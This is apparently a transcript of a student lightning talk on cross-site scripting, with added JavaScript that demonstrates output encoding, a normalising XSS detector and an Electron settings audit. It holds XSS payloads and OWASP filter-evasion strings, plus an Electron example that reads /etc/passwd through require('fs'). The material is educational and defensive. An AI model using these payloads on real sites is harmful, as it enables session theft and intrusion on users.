
Looking into XSS input values (XSSの入力値を調べてみた / searching xss insertion value)


2018/02/03 Student lightning talks (学生LT) at freee

Tomoyuki KOYAMA

February 03, 2018


Transcript

  1. XSS


  2. B1 (first-year undergraduate)
    Twitter: @tmyk_kym
    Blog: https://blog.koyama.me/
    Network/Web/Server/Security
    PyCon JP, Seccamp, etc.

  3. XSS
    (Cross Site Scripting)
    Input that is written into an HTML page without being neutralised, so the browser runs it as part of the page.
    CWE-79: Improper Neutralization of Input During
    Web Page Generation ('Cross-site Scripting') (3.0)

  4. ...
    XSS Sample page: it writes $_GET['mode'] into the HTML as-is.
    With ?mode=hello the page renders:

    XSS Sample
    hello

  5. ...
    With a script tag as the value, e.g. ?mode=<script>alert()</script>, the tag becomes part of the page and the browser runs alert():

    XSS Sample
    (alert() dialog instead of text)

  6. XSS
    Stored XSS (persistent)
    Reflected XSS (non-persistent)
    DOM Based XSS

  7. XSS
    == XSS


  8. Payloads (by injection context)
    <script>alert(1)</script>            (HTML body)
    "><script>alert(1)</script>          (close the attribute and the tag, then inject a tag)
    " onmouseover="alert(1)              (stay inside the attribute, add an event handler)
    x" onerror="alert(1)     <- img src
    javascript:alert(1)      <- a href
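Each payload above targets a different sink, which is why one "escape everything" call is not enough: HTML-escaping does nothing against javascript: in an href, and a URL allowlist does nothing in a text node. The block below is an added example (my code, not the deck's PHP sample) that rebuilds the XSS Sample page in JavaScript with one encoder per context and runs the five payloads through the unsafe and the safe version. The names renderUnsafe, renderSafe, escapeHtml, safeUrl and survived are chosen here; the payload list is constructed from the slide.

```javascript
// Added example: context-aware output encoding for the injection contexts the
// payloads above target. Not the slide's PHP sample; function names are ours.

// HTML text and quoted attribute values: neutralise the five significant characters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// URL-valued attributes (href/src): escaping alone does not stop "javascript:",
// because that is a perfectly valid attribute value. Allowlist the scheme instead.
// Browsers ignore tab/newline/CR and leading control characters when parsing a
// scheme, so strip them before looking at it (a conservative over-approximation).
function safeUrl(u) {
  const probe = String(u).replace(/[\u0000-\u0020]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(probe);
  if (scheme && !/^https?$/i.test(scheme[1])) return 'about:blank';
  return escapeHtml(u);
}

// The pattern from the slides: the query value is dropped straight into the page,
// here in three sinks at once (text node, img src, a href).
function renderUnsafe(mode) {
  return `<h1>XSS Sample</h1><p>${mode}</p><img src="${mode}"><a href="${mode}">link</a>`;
}

// Same page, each sink encoded for its own context.
function renderSafe(mode) {
  const text = escapeHtml(mode);
  const url = safeUrl(mode);
  return `<h1>XSS Sample</h1><p>${text}</p><img src="${url}"><a href="${url}">link</a>`;
}

// The payloads listed on the slide (constructed test input).
const PAYLOADS = [
  '<script>alert(1)</script>',
  '"><script>alert(1)</script>',
  '" onmouseover="alert(1)',
  'x" onerror="alert(1)',
  'javascript:alert(1)',
];

// Cheap textual markers that a payload landed in an executable position.
// Good enough for these fixed payloads; this is not a general XSS detector.
function survived(html) {
  return html.includes('<script>') || html.includes('" onmouseover="') ||
         html.includes('" onerror="') || /(src|href)="javascript:/.test(html);
}

// One row per payload: does it survive the unsafe render, does it survive the safe one.
function compare() {
  return PAYLOADS.map((p) => ({
    payload: p,
    unsafe: survived(renderUnsafe(p)),
    safe: survived(renderSafe(p)),
  }));
}

console.table(compare());
```

In the unsafe render every row comes back unsafe: true; in the safe render every row is safe: false. Note that safeUrl still lets protocol-relative and relative URLs through, which is the usual trade-off for a src/href sink; tighten the allowlist to absolute https URLs if the application never needs relative links.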

  9. XSS


  10. ?

  11. ?


  12. OWASP
    OWASP XSS Filter Evasion Cheat Sheet
    2015 Japanese translation (hosted by JPCERT/CC)
    XSS - OWASP
    https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

  13. Three picks from the cheat sheet

  14. [1] <SCRIPT SRC="http://example.com/xss.js"></SCRIPT>

    Upper/lower case does not matter: the HTML parser treats tag and attribute names case-insensitively,
    so a filter that only looks for the lowercase spelling misses what the browser reads as
    <script src="http://example.com/xss.js"></script>

  15. [2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    The HTML parser keeps the first '<' as text and still opens a script element at <SCRIPT>;
    the '//' comments out the stray '<' in front of </SCRIPT> so the script has no syntax error.
    Filters that pair an '<' with the next '>' and compare what is between them do not see a script tag.
    ...
    "> alert("XSS");//<

  16. [3] (hexadecimal character references)
    cript:ale
    rt('XSS')>
    ... the value is written with HTML character references in hexadecimal (16進, &#x..;); the parser decodes them before the attribute value is used, so the browser ends up with the plain form
    ...
    onerror="javascript:alert('XSS')">

  17. ( )


  18. ( )

    alert(String.fromCharCode(88,83,83))>
    String.fromCharCode(88,83,83) builds the string "XSS" from character codes (88 = 'X', 83 = 'S'),
    so this is alert('XSS') written without any quote character, for sinks where quotes are filtered or would terminate the attribute.
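The picks on slides 14 to 18 all beat a filter that looks for a literal `<script>`: by case, by an extra bracket, by encoding the scheme as character references, or by building the string at run time. As an added example (my code, not from the deck or the cheat sheet), the block below shows such a naive filter failing on those inputs and a normalisation step (numeric character references decoded, String.fromCharCode folded, tab/CR/LF removed, case folded) that lets a detector see what the browser ends up executing. naiveFilter, normalise and looksLikeXss are names chosen here; the evasion strings are constructed in the cheat-sheet forms quoted on the slides, with example.com as host.

```javascript
// Added example: why blacklist filters lose to the cheat-sheet evasions above,
// and what normalising input before a check buys. Not code from the deck.

// The kind of filter the evasions target: strip the literal lowercase tags, once.
function naiveFilter(input) {
  return input.replace('<script>', '').replace('</script>', '');
}

// Decode numeric character references (&#x6A; / &#106;, trailing ';' optional),
// which the HTML parser resolves inside attribute values before any URL parsing.
function decodeCharRefs(s) {
  const cp = (n) => (n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => cp(parseInt(d, 10)));
}

// Fold String.fromCharCode(88,83,83) into the literal it produces ("XSS")
// without evaluating anything: only comma-separated numeric arguments match.
function foldFromCharCode(s) {
  return s.replace(/String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)/g, (_, args) =>
    JSON.stringify(String.fromCharCode(...args.split(',').map(Number))));
}

// Bring the input to the form the browser executes: references decoded,
// fromCharCode folded, tab/CR/LF (ignored inside a URL scheme) removed, case folded.
function normalise(input) {
  return foldFromCharCode(decodeCharRefs(input)).replace(/[\t\n\r]/g, '').toLowerCase();
}

// A detector over the normalised text. Still a blacklist, so treat it as a
// logging/WAF signal, not a replacement for output encoding at the sink.
function looksLikeXss(input) {
  const n = normalise(input);
  return /<script\b/.test(n) || /javascript:/.test(n) || /\bon[a-z]+\s*=/.test(n);
}

// Constructed inputs in the form of the cheat-sheet entries the slides pick.
const EVASIONS = [
  '<SCRIPT SRC="http://example.com/xss.js"></SCRIPT>',         // [1] upper case
  '<<SCRIPT>alert("XSS");//<</SCRIPT>',                         // [2] extraneous bracket
  '<IMG SRC=&#x6A;&#x61;&#x76;&#x61;script:alert(1)>',           // [3] hex references
  '<IMG SRC="jav\tascript:alert(1)">',                           // embedded tab
  '<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>',   // slide 18
];

// One row per evasion: did the naive filter touch it, does the normalised check catch it.
function report() {
  return EVASIONS.map((e) => ({
    input: e,
    naiveFilterChangedIt: naiveFilter(e) !== e,
    detectedAfterNormalise: looksLikeXss(e),
  }));
}

console.table(report());
```

Every row comes back naiveFilterChangedIt: false and detectedAfterNormalise: true. The normaliser is deliberately lossy (it over-approximates what a browser would decode), which is the right direction for a detector and the wrong one for a sanitiser; the fix that holds is still encoding at the sink, as on slide 8.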

  19.

  20. Electron and Marp
    Marp is built on Electron, which runs web content (HTML/JavaScript) inside a desktop app ...
    alert()
    alert ... ( )

  21. ?


  22. JVN#21174546: Marp, JavaScript execution
    https://jvn.jp/jp/JVN21174546/
    "However, sanitizing inline script should be considered in the future."
    quoted from: [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp
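The issue title above is what an XSS turns into when the vulnerable page runs inside Electron with Node integration: the injected script is no longer confined to the browser sandbox and can call require('fs'). The block below is an added example, not Marp's code, of the renderer settings that decide this, with a small audit function of the kind used in Electron security reviews. preload.js and index.html are hypothetical file names, and the defaults assumed for absent keys are current Electron's (nodeIntegration off since Electron 5, contextIsolation on since Electron 12); an app that targets older Electron should set every key explicitly.

```javascript
// Added example (not from Marp): Electron renderer settings that decide whether
// an XSS becomes local file access / code execution, plus an audit of them.

// What old Electron apps shipped with: the page shares a JavaScript world with
// Node, so <img src=x onerror="require('fs').readFileSync('/etc/passwd')">
// reads a local file instead of popping an alert.
const WEAK_PREFS = {
  nodeIntegration: true,
  contextIsolation: false,
  sandbox: false,
};

// Hardened: the page gets no require()/process, the preload script lives in a
// separate world and exposes only an allowlisted API via contextBridge, and the
// renderer runs under the Chromium sandbox.
const HARDENED_PREFS = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  preload: '/absolute/path/to/preload.js', // hypothetical; Electron requires an absolute path
};

// Audit a webPreferences object and return one finding per dangerous setting.
// Absent keys take current Electron defaults (assumption stated in the lead-in).
function auditWebPreferences(prefs) {
  const get = (k, dflt) => (prefs[k] === undefined ? dflt : prefs[k]);
  const findings = [];
  if (get('nodeIntegration', false) === true) {
    findings.push("nodeIntegration is true: injected script can require('fs'), 'child_process', ...");
  }
  if (get('contextIsolation', true) === false) {
    findings.push('contextIsolation is false: page script can reach preload/Node objects');
  }
  if (get('sandbox', true) === false) {
    findings.push('sandbox is false: renderer process is not OS-sandboxed');
  }
  if (get('webSecurity', true) === false) {
    findings.push('webSecurity is false: same-origin policy disabled for this window');
  }
  if (get('allowRunningInsecureContent', false) === true) {
    findings.push('allowRunningInsecureContent is true: http script may load into an https page');
  }
  return findings;
}

// Only meaningful inside an Electron main process; kept inside a function so
// this file also loads under plain Node for the audit above.
function createWindow() {
  const { BrowserWindow } = require('electron');
  const win = new BrowserWindow({ webPreferences: HARDENED_PREFS });
  win.loadFile('index.html'); // hypothetical renderer page
  return win;
}

console.log(auditWebPreferences(WEAK_PREFS));
```

The audit of WEAK_PREFS returns three findings and that of HARDENED_PREFS none. These settings limit the blast radius; they do not remove the XSS itself, so the markdown-to-HTML step still needs its own sanitisation (the point the quoted issue makes) and the renderer page should carry a Content-Security-Policy that forbids inline script.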

  23. XSS
    XSS
    alert()
    Electron
